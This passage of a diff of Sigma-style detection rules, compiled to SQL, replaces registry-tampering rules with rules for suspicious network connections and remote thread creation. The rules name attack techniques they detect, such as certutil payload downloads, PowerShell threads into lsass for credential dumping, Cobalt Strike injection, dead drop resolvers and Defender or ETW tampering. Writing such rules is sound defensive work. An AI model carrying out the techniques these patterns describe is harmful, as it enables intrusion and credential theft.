'')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE 